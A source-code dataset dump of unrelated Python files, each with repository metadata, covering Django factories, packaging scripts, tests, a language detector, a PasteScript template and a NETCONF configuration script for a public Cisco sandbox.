start_timestamp = datetime.datetime.now()
class ContentSummaryLogFactory(factory.DjangoModelFactory):
class Meta:
model = models.ContentSummaryLog
user = factory.SubFactory(FacilityUserFactory)
content_id = uuid.uuid4().hex
channel_id = uuid.uuid4().hex
start_timestamp = datetime.datetime.now()
class ContentRatingLogFactory(factory.DjangoModelFactory):
class Meta:
model = models.ContentRatingLog
user = factory.SubFactory(FacilityUserFactory)
content_id = uuid.uuid4().hex
channel_id = uuid.uuid4().hex
class UserSessionLogFactory(factory.DjangoModelFactory):
class Meta:
model = models.UserSessionLog
user = factory.SubFactory(FacilityUserFactory)
| 23.425532 | 59 | 0.745686 | 109 | 1,101 | 7.449541 | 0.302752 | 0.044335 | 0.081281 | 0.103448 | 0.618227 | 0.618227 | 0.396552 | 0.396552 | 0.396552 | 0.396552 | 0 | 0.006593 | 0.173479 | 1,101 | 46 | 60 | 23.934783 | 0.885714 | 0 | 0 | 0.551724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.172414 | 0 | 0.862069 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
9f71a197572466c48094262987b091e399a3df17 | 237 | py | Python | lists/urls.py | Tawakalt/todo_list | 184293acf62771f60c6fdc46271634ae89684775 | [
"MIT"
] | null | null | null | lists/urls.py | Tawakalt/todo_list | 184293acf62771f60c6fdc46271634ae89684775 | [
"MIT"
] | 5 | 2020-06-06T01:03:12.000Z | 2022-02-10T10:01:49.000Z | lists/urls.py | Tawakalt/todo_list | 184293acf62771f60c6fdc46271634ae89684775 | [
"MIT"
] | 1 | 2020-01-20T12:44:56.000Z | 2020-01-20T12:44:56.000Z | from django.urls import path
from . import views
urlpatterns = [
path('new', views.new_list, name='new_list'),
path('<list_id>/', views.view_list, name='view_list'),
path('users/<email>/', views.my_lists, name='my_lists'),
] | 29.625 | 60 | 0.670886 | 35 | 237 | 4.342857 | 0.457143 | 0.092105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.139241 | 237 | 8 | 61 | 29.625 | 0.745098 | 0 | 0 | 0 | 0 | 0 | 0.218487 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f7961daf22e80aa849ae0a67694bcc8b1f9979d | 348 | py | Python | setup.py | anthonyvallee/bettejpeg | eaa809f4d07d85274cd4ee4671352ff069f94307 | [
"Apache-2.0"
] | 1 | 2020-03-29T13:12:32.000Z | 2020-03-29T13:12:32.000Z | setup.py | anthonyvallee/bettejpeg | eaa809f4d07d85274cd4ee4671352ff069f94307 | [
"Apache-2.0"
] | 2 | 2016-10-23T21:15:52.000Z | 2016-12-08T07:25:07.000Z | setup.py | RentAPlace/python-betterjpeg | eaa809f4d07d85274cd4ee4671352ff069f94307 | [
"Apache-2.0"
] | null | null | null | from setuptools import (find_packages, setup)
from rap import betterjpeg
setup(
name=betterjpeg.__pkgname__,
description=betterjpeg.__description__,
version=betterjpeg.__version__,
packages=["rap.betterjpeg"],
entry_points="""
[console_scripts]
betterjpeg=rap.betterjpeg.betterjpeg:cli
"""
)
| 23.2 | 49 | 0.686782 | 32 | 348 | 7 | 0.53125 | 0.116071 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215517 | 348 | 14 | 50 | 24.857143 | 0.820513 | 0 | 0 | 0 | 0 | 0 | 0.281437 | 0.11976 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9f9602b2224dec858d62feca228f9bec5c6a8d6a | 2,320 | py | Python | tensorflow_transform/beam/tft_beam_io/beam_metadata_io_test.py | sswapnil2/transform | 54561ddb357ef752153dd569aad7cc2651b38ac2 | [
"Apache-2.0"
] | null | null | null | tensorflow_transform/beam/tft_beam_io/beam_metadata_io_test.py | sswapnil2/transform | 54561ddb357ef752153dd569aad7cc2651b38ac2 | [
"Apache-2.0"
] | null | null | null | tensorflow_transform/beam/tft_beam_io/beam_metadata_io_test.py | sswapnil2/transform | 54561ddb357ef752153dd569aad7cc2651b38ac2 | [
"Apache-2.0"
] | 1 | 2020-04-07T23:48:26.000Z | 2020-04-07T23:48:26.000Z | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for beam_metadata_io."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# GOOGLE-INITIALIZATION
import apache_beam as beam
from tensorflow_transform.beam.tft_beam_io import beam_metadata_io
from tensorflow_transform.beam.tft_beam_io import test_metadata
from tensorflow_transform.tf_metadata import metadata_io
import unittest
from tensorflow.python.framework import test_util
class BeamMetadataIoTest(test_util.TensorFlowTestCase):
def testWriteMetadataNonDeferred(self):
# Write metadata to disk using WriteMetadata PTransform.
with beam.Pipeline() as pipeline:
path = self.get_temp_dir()
_ = (test_metadata.COMPLETE_METADATA
| beam_metadata_io.WriteMetadata(path, pipeline))
# Load from disk and check that it is as expected.
metadata = metadata_io.read_metadata(path)
self.assertEqual(metadata, test_metadata.COMPLETE_METADATA)
def testWriteMetadataDeferred(self):
# Write metadata to disk using WriteMetadata PTransform, combining
# incomplete metadata with (deferred) complete metadata.
with beam.Pipeline() as pipeline:
path = self.get_temp_dir()
deferred_metadata = pipeline | 'CreateDeferredMetadata' >> beam.Create(
[test_metadata.COMPLETE_METADATA])
metadata = beam_metadata_io.BeamDatasetMetadata(
test_metadata.INCOMPLETE_METADATA, deferred_metadata)
_ = metadata | beam_metadata_io.WriteMetadata(path, pipeline)
# Load from disk and check that it is as expected.
metadata = metadata_io.read_metadata(path)
self.assertEqual(metadata, test_metadata.COMPLETE_METADATA)
if __name__ == '__main__':
unittest.main()
| 36.825397 | 77 | 0.771983 | 298 | 2,320 | 5.785235 | 0.40604 | 0.046404 | 0.040603 | 0.064965 | 0.37819 | 0.356148 | 0.356148 | 0.356148 | 0.24826 | 0.24826 | 0 | 0.004117 | 0.1625 | 2,320 | 62 | 78 | 37.419355 | 0.88317 | 0.384914 | 0 | 0.275862 | 0 | 0 | 0.021383 | 0.015681 | 0 | 0 | 0 | 0 | 0.068966 | 1 | 0.068966 | false | 0 | 0.310345 | 0 | 0.413793 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
9f9abf9bd659e3c5cd886d27c3067e12da0ea781 | 490 | py | Python | src/basic/check_type.py | xxzhwx/hello-python | 83bb01c146049d3c7f7fa9ed007abee054d004ef | [
"MIT"
] | null | null | null | src/basic/check_type.py | xxzhwx/hello-python | 83bb01c146049d3c7f7fa9ed007abee054d004ef | [
"MIT"
] | null | null | null | src/basic/check_type.py | xxzhwx/hello-python | 83bb01c146049d3c7f7fa9ed007abee054d004ef | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
@author: xxzhwx
'''
from types import IntType
def is_int_type(num):
# 对象身份比较
if type(num) is IntType:
return True
return False
def is_int_typeX(num):
if isinstance(num, int):
return True
# if type(num) is int:
# return True
return False
# Usage
print(is_int_type(1))
print(is_int_type(1.0))
print(is_int_type(''))
print(is_int_typeX(1))
print(is_int_typeX(1.0))
print(is_int_typeX('')) | 15.3125 | 28 | 0.606122 | 75 | 490 | 3.746667 | 0.333333 | 0.160142 | 0.213523 | 0.149466 | 0.298932 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019231 | 0.257143 | 490 | 32 | 29 | 15.3125 | 0.752747 | 0.195918 | 0 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.066667 | 0 | 0.466667 | 0.4 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9fa5fa2df40b29c75a161e9790ab053c973c7300 | 3,569 | py | Python | langsense/core.py | sneub/langsense | 7e194582f19bbd2b7c93f8a1ef5d96d4d9f5ae73 | [
"Apache-2.0"
] | null | null | null | langsense/core.py | sneub/langsense | 7e194582f19bbd2b7c93f8a1ef5d96d4d9f5ae73 | [
"Apache-2.0"
] | null | null | null | langsense/core.py | sneub/langsense | 7e194582f19bbd2b7c93f8a1ef5d96d4d9f5ae73 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from . import ruleset
import re
import operator
class LangSense(object):
def detect(self, string, country_hint=None):
if type(string) == str:
text = string.decode('utf-8').lower()
else:
text = string.lower()
shortlist_char = self._char_shortlist(text)
shortlist_rules = self._rule_shortlist(text)
shortlist_words = self._word_shortlist(text)
shortlist_segments = self._segment_shortlist(text)
result = {l: 0 for l in ruleset.RuleSet.language_list}
for l in ruleset.RuleSet.language_list:
try:
result[l] += (shortlist_char[l] * ruleset.RuleSet.score_weights['char'])
except Exception, _:
pass
try:
result[l] += (shortlist_rules[l] * ruleset.RuleSet.score_weights['rule'])
except Exception, _:
pass
try:
result[l] += (shortlist_words[l] * ruleset.RuleSet.score_weights['word'])
except Exception, _:
pass
try:
result[l] += (shortlist_segments[l] * ruleset.RuleSet.score_weights['segment'])
except Exception, _:
pass
sum_scores = sum([v for _, v in result.iteritems()])
result = {k: float(v)/sum_scores for k, v in result.iteritems() if v > 0}
if country_hint:
country_hint = country_hint.decode('utf-8').upper()
lang = ruleset.RuleSet.country_langs[country_hint]
if lang in result:
result[lang] *= ruleset.RuleSet.score_weights['hint']
result = list(reversed(sorted(result.items(), key=operator.itemgetter(1))))
return result
def _char_shortlist(self, string):
lang_shortlist = []
for c in string:
lang_shortlist = lang_shortlist + [(c, l) for (l, a) in ruleset.RuleSet.alphabets.iteritems() if c in a]
langs = set([i[1] for i in lang_shortlist])
master_langs = []
bad_langs = []
scores = {l: len(string) for l in langs}
for l in langs:
for c, _ in lang_shortlist:
if c not in ruleset.RuleSet.alphabets[l]:
bad_langs.append(l)
scores[l] -= 1
master_langs.append(l)
scores = {k: s/len(string) for k, s in scores.iteritems()}
return {k: v for k, v in scores.iteritems() if v > 0}
def _rule_shortlist(self, string):
lang_shortlist = []
scores = {}
for lang, rules in ruleset.RuleSet.word_rules.iteritems():
for rule in rules:
if re.search(rule, string):
lang_shortlist.append(lang)
if lang in scores:
scores[lang] += 1
else:
scores[lang] = 1
return {k: scores[k] for k in list(set(lang_shortlist))}
def _segment_shortlist(self, string):
lang_shortlist = []
scores = {}
for lang, segments in ruleset.RuleSet.word_segments.iteritems():
for segment in segments:
if re.search(r'\w'+ segment + r'\b', string) or re.search(r'\b'+ segment + r'\w', string) or re.search(r'\w'+ segment + r'\w', string):
lang_shortlist.append(lang)
if lang in scores:
scores[lang] += 1
else:
scores[lang] = 1
return {k: scores[k] for k in list(set(lang_shortlist))}
def _word_shortlist(self, string):
lang_shortlist = []
scores = {}
for lang, words in ruleset.RuleSet.words.iteritems():
for word in words:
if re.search(r'\b'+ word + r'\b', string):
lang_shortlist.append(lang)
if lang in scores:
scores[lang] += 1
else:
scores[lang] = 1
return {k: scores[k] for k in list(set(lang_shortlist))}
| 27.666667 | 143 | 0.609695 | 478 | 3,569 | 4.416318 | 0.16318 | 0.086215 | 0.072004 | 0.061582 | 0.413074 | 0.32307 | 0.306016 | 0.221696 | 0.157745 | 0.157745 | 0 | 0.005712 | 0.26422 | 3,569 | 128 | 144 | 27.882813 | 0.798172 | 0.005884 | 0 | 0.413043 | 0 | 0 | 0.013818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.043478 | 0.032609 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9fa815038e88bc8c7182ffc9b58dd48bcbb7159c | 329 | py | Python | src/testMultiRootWkspc/workspace5/remoteDebugger-start.py | ChaseKnowlden/vscode-jupyter | 9bdaf87f0b6dcd717c508e9023350499a6093f97 | [
"MIT"
] | 2,461 | 2016-01-21T16:40:43.000Z | 2022-03-31T12:01:55.000Z | src/testMultiRootWkspc/workspace5/remoteDebugger-start.py | ChaseKnowlden/vscode-jupyter | 9bdaf87f0b6dcd717c508e9023350499a6093f97 | [
"MIT"
] | 12,536 | 2019-05-06T21:26:14.000Z | 2022-03-31T23:06:48.000Z | src/testMultiRootWkspc/workspace5/remoteDebugger-start.py | vasili8m/vscode-python | 846eee870e8b7bab38172600836faedb5fb80166 | [
"MIT"
] | 871 | 2019-05-15T13:43:55.000Z | 2022-03-31T03:04:35.000Z | import sys
import time
def main():
sys.stdout.write('this is stdout')
sys.stdout.flush()
sys.stderr.write('this is stderr')
sys.stderr.flush()
# Give the debugger some time to add a breakpoint.
time.sleep(5)
for i in range(1):
time.sleep(0.5)
pass
print('this is print')
main()
| 18.277778 | 54 | 0.613982 | 51 | 329 | 3.960784 | 0.568627 | 0.089109 | 0.108911 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016461 | 0.261398 | 329 | 17 | 55 | 19.352941 | 0.814815 | 0.145897 | 0 | 0 | 0 | 0 | 0.146953 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0.076923 | 0.153846 | 0 | 0.230769 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9fa8a760a99df59cb027859fabf342dae3bf5734 | 2,985 | py | Python | rbb_tools/src/rbb_tools/simenvs/test.py | SK4P3/rbb_core | 618617270314af5335de30179072244e1f440c4c | [
"MIT"
] | 55 | 2019-05-09T06:43:05.000Z | 2021-12-08T05:56:43.000Z | rbb_tools/src/rbb_tools/simenvs/test.py | SK4P3/rbb_core | 618617270314af5335de30179072244e1f440c4c | [
"MIT"
] | 5 | 2019-09-08T15:33:28.000Z | 2021-04-17T17:30:53.000Z | rbb_tools/src/rbb_tools/simenvs/test.py | SK4P3/rbb_core | 618617270314af5335de30179072244e1f440c4c | [
"MIT"
] | 16 | 2019-08-08T07:15:35.000Z | 2021-12-07T15:34:41.000Z | # AMZ-Driverless
# Copyright (c) 2019 Authors:
# - Huub Hendrikx <hhendrik@ethz.ch>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import yaml
from rbb_tools.simenvs.environment import SimulationEnvironment
class TestSimulationEnvironment(SimulationEnvironment):
def __init__(self, env_config, sim_config, output_dir, tmp_dir):
super(TestSimulationEnvironment, self).__init__(env_config, sim_config, output_dir, tmp_dir)
self._fail = True
if 'fail' in sim_config:
self._fail = sim_config["fail"]
def prepare(self):
logging.info("TestSimulationEnvironment.prepare()")
return True
def simulate(self):
logging.info("TestSimulationEnvironment.simulate()")
output_file = {
'title': "TestSimulationEnvironment",
'repetitions': {
'Test run 1': {
'bag': None,
'pass': True,
'duration': 1.0,
'results': {"some-result": "good"}
},
'Test run 2': {
'bag': 'missing-bag.bag',
'pass': not self._fail,
'duration': 1.0,
'results': {"some-result": "bad"}
},
'Test run 3': {
'bag': 'bag.bag',
'pass': True,
'duration': 1.0,
'results': {"some-result": "this one has a bag"}
}
}
}
with open(self._output_dir + "/output.yaml", 'w') as f:
yaml.safe_dump(output_file, f, default_flow_style=False)
with open(self._output_dir + "/bag.bag", 'w') as f:
for x in range(1024):
f.write("THIS IS A FAKE ROSBAG \n")
return True
def clean(self):
logging.info("TestSimulationEnvironment.clean()")
environment = TestSimulationEnvironment
| 34.709302 | 100 | 0.61206 | 350 | 2,985 | 5.131429 | 0.471429 | 0.048998 | 0.025056 | 0.066815 | 0.114143 | 0.090757 | 0.075724 | 0.075724 | 0 | 0 | 0 | 0.008072 | 0.294472 | 2,985 | 85 | 101 | 35.117647 | 0.844729 | 0.368844 | 0 | 0.152174 | 0 | 0 | 0.201505 | 0.069318 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0.065217 | 0.065217 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9fb1e69711f393a902cc733c79510a11dd6b8db4 | 7,309 | py | Python | backend/venv/Lib/site-packages/github/tools/template.py | analurandis/Tur | b4b5d1230d70659be0c3f477f0baea68fc46ba39 | [
"MIT"
] | null | null | null | backend/venv/Lib/site-packages/github/tools/template.py | analurandis/Tur | b4b5d1230d70659be0c3f477f0baea68fc46ba39 | [
"MIT"
] | null | null | null | backend/venv/Lib/site-packages/github/tools/template.py | analurandis/Tur | b4b5d1230d70659be0c3f477f0baea68fc46ba39 | [
"MIT"
] | null | null | null | """
:Description: PasteScript Template to generate a GitHub hosted python package.
Let you set the package name, a one line description, the Licence (support
GPL, LGPL, AGPL and BSD - GPLv3 by default) and the author name, email and
organisation variables::
paster create -t gh_package <project name>
.. note::
The default author name and email variables are the ones set with
git-config::
git config --global user.name "Damien Lebrun"
git config --global user.email dinoboff@hotmail.com
The result::
<project name>/
docs/
source/
_static
_templates/
conf.py
index.rst
src/
<package name>/
__init__.py
support-files/
.gitignore
bootstrap.py
LICENCE
MANIFEST.in
pavement.py
README.rst
setup.cfg
* <project name>/pavement.py is the paver configuration file. All the setuptools
tasks are available with paver. Paver make the creation of of new task easy.
See `paver documentation <http://www.blueskyonmars.com/projects/paver/>`_
for more details::
paver paverdocs
* <project name>/src contain your package.
* <project name>/docs/source/ will contains your documentation source. conf.py
is Sphinx' configuration file.
Check `Sphinx' documentation <http://sphinx.pocoo.org/>`_ for more details.
.. note::
The version number, the project name and author name(s) are set in
``pavement.py`` and shared with ``docs/source/conf.py``.
However licence and copyright information are hard coded into ``LICENCE``,
``pavement.py``, ``docs/source/conf`` and ``src/<package>/__init__.py``.
"""
from datetime import date
import os
from paste.script.templates import var
from paste.script.templates import Template
from git import Git
YEAR = date.today().year
LICENCE_HEADER = """%(description)s
Copyright (c) %(year)s, %(author)s
All rights reserved.
"""
GPL = """
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU%(gpl_type)s General Public License as published by
the Free Software Foundation, either version %(gpl_version)s of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU%(gpl_type)s General Public License for more details.
You should have received a copy of the GNU%(gpl_type)s General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
BSD = """
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the %(org)s nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
DEFAULT_NAME = Git(os.getcwd()).config(
'user.name', with_exceptions=False).strip()
DEFAULT_NAME = DEFAULT_NAME or os.getlogin()
DEFAULT_EMAIL = Git(os.getcwd()).config(
'user.email', with_exceptions=False).strip()
class GithubTemplate(Template):
"""Paver template for a GitHub hosted Python package."""
_template_dir = 'tmpl/gh'
summary = ("A basic layout for project hosted on GitHub "
"and managed with Paver")
use_cheetah = True
vars = [
var('package', 'The package contained',
default='example'),
var('description',
'One-line description of the package',
default='<On-line description>'),
var('licence',
'package licence - GPLv2/GPLv3/LGPLv2/LGPLv3/AGPLv3/BSD',
default='GPLv3'),
var('author', 'Author name', DEFAULT_NAME),
var('author_email', 'Author email', DEFAULT_EMAIL),
var('org', 'Organisation name - for licence.',
default='<Organisation>'),
]
def check_vars(self, vars, command):
"""
Reset the package variable in interactive so that project and
package names can be different (GitHub and Python
Have different restriction on names).
"""
if not command.options.no_interactive and \
not hasattr(command, '_deleted_once'):
del vars['package']
command._deleted_once = True
return Template.check_vars(self, vars, command)
def pre(self, command, output_dir, vars):
"""
Set extra template variables:
* "year", current year.
* "gitignore", set to ".gitignore".
* "licence_body", licence notice of the package.
* "gpl_type", for gpl licences
"""
vars['year'] = YEAR
vars['gitignore'] = '.gitignore'
licence = vars.get('licence')
vars['licence_body'] = ''
vars['gpl_type'] = ''
vars['gpl_version'] = ''
if licence:
if licence == 'BSD':
licence_tmpl = BSD
elif licence == 'LGPLv2':
vars['gpl_type'] = ' Lesser'
vars['gpl_version'] = '2'
vars['licence'] = 'LGPLv2'
licence_tmpl = GPL
elif licence == 'LGPLv3':
vars['gpl_type'] = ' Lesser'
vars['gpl_version'] = '3'
vars['licence'] = 'LGPLv3'
licence_tmpl = GPL
elif licence == 'AGPLv3':
vars['gpl_type'] = ' Affero'
vars['gpl_version'] = '3'
vars['licence'] = 'AGPLv3'
licence_tmpl = GPL
elif licence == 'GPLv2':
vars['gpl_type'] = ''
vars['gpl_version'] = '2'
vars['licence'] = 'GPLv2'
licence_tmpl = GPL
else:
vars['gpl_type'] = ''
vars['gpl_version'] = '3'
vars['licence'] = 'GPL'
licence_tmpl = GPL
vars['licence_body'] = (LICENCE_HEADER + licence_tmpl) % vars | 36.004926 | 82 | 0.63716 | 907 | 7,309 | 5.066152 | 0.334068 | 0.018281 | 0.014363 | 0.008487 | 0.181502 | 0.098585 | 0.066159 | 0.052666 | 0.045267 | 0.029597 | 0 | 0.00375 | 0.270352 | 7,309 | 203 | 83 | 36.004926 | 0.857866 | 0.289369 | 0 | 0.163636 | 1 | 0 | 0.560985 | 0.007094 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018182 | false | 0 | 0.045455 | 0 | 0.118182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
9fb58ec6926f4ee6f24f0c39bf1b0ebd934bf3b3 | 1,284 | py | Python | netconf-cisco.py | Raul-Flores/Network-programmability-examples | e540b050b89da167b84f415565b75313605e01b2 | [
"Apache-2.0"
] | 2 | 2020-01-09T18:32:37.000Z | 2020-01-09T18:32:42.000Z | netconf-cisco.py | Raul-Flores/Network-programmability-examples | e540b050b89da167b84f415565b75313605e01b2 | [
"Apache-2.0"
] | null | null | null | netconf-cisco.py | Raul-Flores/Network-programmability-examples | e540b050b89da167b84f415565b75313605e01b2 | [
"Apache-2.0"
] | null | null | null | from ncclient import manager
from xml.dom import minidom
import xmltodict
huaweiautomation = {'address':'ios-xe-mgmt-latest.cisco.com',
'netconf_port': 10000, 'username': 'developer', 'password': 'C1sco12345'}
huawei_manager = manager.connect(host = huaweiautomation["address"], port = huaweiautomation["netconf_port"], username = huaweiautomation["username"],
password = huaweiautomation["password"], device_params = {'name': 'iosxe'}, hostkey_verify = False)
filter_Interfaces= """
<filter>
<interfaces xmlns="urn:ietf:params:xml:ns:yang:ietf-interfaces">
<interface>
</interface>
</interfaces>
</filter>
"""
#Para cualquier interfaz
huawei_get_interfaces = huawei_manager.get_config('running', filter_Interfaces).xml
xml_pretty = minidom.parseString(huawei_get_interfaces)
print ("Interfaces en XML format")
print ("#"*100)
print (xml_pretty.toprettyxml(indent=" "))
xml_to_dict_general = xmltodict.parse(huawei_get_interfaces)
print ("#"*100)
print ("Extraer todas las interfaces ")
for x in xml_to_dict_general['rpc-reply']['data']['interfaces']['interface']:
print (x['name'])
print ("#"*100)
#print ("Estatus....")
#print ("")
#huawei_manager.connected
#Verificar capabilitys
#for capability in huawei_manager.server_capabilities:
# print (capability) | 29.860465 | 150 | 0.746106 | 150 | 1,284 | 6.213333 | 0.5 | 0.055794 | 0.061159 | 0.051502 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017301 | 0.099688 | 1,284 | 43 | 151 | 29.860465 | 0.788927 | 0.135514 | 0 | 0.115385 | 0 | 0 | 0.326993 | 0.072464 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.076923 | 0.115385 | 0 | 0.115385 | 0.269231 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
9fcb149ac5dfe464c79d244e6065b0b4f62a43f1 | 20,865 | py | Python | modules/simulation/simulation.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | modules/simulation/simulation.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | modules/simulation/simulation.py | LHcau/scheduling-shared-passenger-and-freight-transport-on-a-fixed-infrastructure | bba1e6af5bc8d9deaa2dc3b83f6fe9ddf15d2a11 | [
"BSD-3-Clause"
] | null | null | null | """
Module to execute the simulation for a given instance.
"""
""" import packages """
import logging
from importlib import import_module
import numpy.random as rdm
import copy
import numpy as np
""" import project configurations """
import configurations.settings_simulation as config
""" import project libraries """
import modules.data.datamgm as dtm
from modules.simulation.entities import Tram, Stop, Passengers, CargoRequest, write_entities_log, init_entities_log
# Global logger
logger = dtm.initialise_logger(__name__)
"""
